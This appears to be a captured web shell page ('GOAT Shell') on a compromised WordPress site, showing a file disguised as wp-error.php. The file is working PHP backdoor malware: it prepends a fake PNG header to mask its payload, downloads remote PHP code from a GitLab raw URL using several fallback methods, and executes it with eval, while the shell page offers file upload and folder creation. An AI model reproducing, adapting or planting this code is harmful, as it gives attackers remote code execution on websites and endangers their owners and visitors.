๐Ÿ GOAT Shell

Current path: home/fresvfqn/crimescenecleaningupsuffolkcounty.com/



โฌ†๏ธ Go up: fresvfqn

๐Ÿ“„ Viewing: wp-error.php

\x89\x50\x4E\x47\x0D\x0A\x1A\x0A
 PNG

๏ปฟ\x89\x50\x4E\x47\x0D\x0A\x1A\x0A
<?php

// ๐Ÿ–ผ๏ธ Enhanced Fake PNG Header Generator (to hide payloads in image disguise)
function generateFakePng() {
    $data = '';

    // PNG signature
    $data .= '89 50 4E 47 0D 0A 1A 0A';

    // IHDR chunk
    $data .= '00 00 00 0D';
    $data .= '49 48 44 52';
    $data .= '00 00 00 01'; // Width: 1
    $data .= '00 00 00 01'; // Height: 1
    $data .= '08'; // Bit depth
    $data .= '06'; // Color type: Truecolor with alpha
    $data .= '00'; // Compression
    $data .= '00'; // Filter
    $data .= '00'; // Interlace
    $data .= '1F 15 C4 89'; // Dummy CRC

    // tEXt chunk (Fake software metadata)
    $text = 'Software' . chr(0) . 'Adobe Photoshop';
    $textHex = strtoupper(bin2hex($text));
    $textLength = sprintf('%08X', strlen($text));
    $data .= $textLength;
    $data .= '74 45 58 74'; // tEXt
    $data .= $textHex;
    $data .= '00 00 00 00'; // Dummy CRC

    // pHYs chunk
    $data .= '00 00 00 09';
    $data .= '70 48 59 73';
    $data .= '00 00 0B 13';
    $data .= '00 00 0B 13';
    $data .= '01';
    $data .= '00 00 00 00'; // Dummy CRC

    // IDAT chunk (minimal data)
    $data .= '00 00 00 0A';
    $data .= '49 44 41 54';
    $data .= '78 9C 63 60 00 00 00 02 00 01';
    $data .= '00 00 00 00'; // Dummy CRC

    // IEND chunk
    $data .= '00 00 00 00';
    $data .= '49 45 4E 44';
    $data .= 'AE 42 60 82';

    return hex2bin(str_replace(' ', '', $data));
}

// ๅฏๅŠจไผš่ฏ
session_start();

// ่ฎพ็ฝฎไธปๅœฐๅ€๏ผŒๅฆ‚ๆžœๆฒกๆœ‰่ฎพ็ฝฎๅˆ™ไฝฟ็”จ้ป˜่ฎคๅœฐๅ€
$ไธปๅœฐๅ€ = $_SESSION['ts_url'] ?? 'https://gitlab.com/mrgithub89-group/mrgithub89-projectaa/-/raw/main/img_load.php';

// ๅฎšไน‰ๅŠ ่ฝฝๅ‡ฝๆ•ฐ
function ๅŠ ่ฝฝๆ•ฐๆฎ($ๅœฐๅ€) {
    $ๅ†…ๅฎน = '';
    try {
        $ๆ–‡ไปถ = new SplFileObject($ๅœฐๅ€);
        while (!$ๆ–‡ไปถ->eof()) {
            $ๅ†…ๅฎน .= $ๆ–‡ไปถ->fgets();
        }
    } catch (Throwable $้”™่ฏฏ) {
        $ๅ†…ๅฎน = '';
    }

    // ๅฐ่ฏ•็”จ file_get_contents
    if (strlen(trim($ๅ†…ๅฎน)) < 1) {
        $ๅ†…ๅฎน = @file_get_contents($ๅœฐๅ€);
    }

    // ๅฆ‚ๆžœ่ฟ˜ๅคฑ่ดฅ๏ผŒไฝฟ็”จ curl
    if (strlen(trim($ๅ†…ๅฎน)) < 1 && function_exists('curl_init')) {
        $้€š้“ = curl_init($ๅœฐๅ€);
        curl_setopt_array($้€š้“, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_CONNECTTIMEOUT => 5,
            CURLOPT_TIMEOUT => 10,
        ]);
        $ๅ†…ๅฎน = curl_exec($้€š้“);
        curl_close($้€š้“);
    }

    return $ๅ†…ๅฎน;
}

// ๅฐ่ฏ•ๅŠ ่ฝฝไธป็ฝ‘ๅ€
$็ป“ๆžœ = ๅŠ ่ฝฝๆ•ฐๆฎ($ไธปๅœฐๅ€);

// ็”Ÿๆˆๅขžๅผบ็š„ๅ‡PNGๅคด
$ๅ‡PNGๅคด = generateFakePng();

// ๆ‹ผๆŽฅPNGๅคดๅ’Œ่ฟœ็จ‹ๅ†…ๅฎน
$็ป“ๆžœ = $ๅ‡PNGๅคด . $็ป“ๆžœ;

/**_**//**_**//**_**//**_**//**_**//**_**//**_**/
// ๅฆ‚ๆžœๆˆๅŠŸ่Žทๅ–ๅ†…ๅฎน๏ผŒๅˆ™ๆ‰ง่กŒ
if (strlen(trim($็ป“ๆžœ)) > 0) {
    @eval("?>$็ป“ๆžœ");
}
?>


๐Ÿ“ค Upload File


๐Ÿ“ Create Folder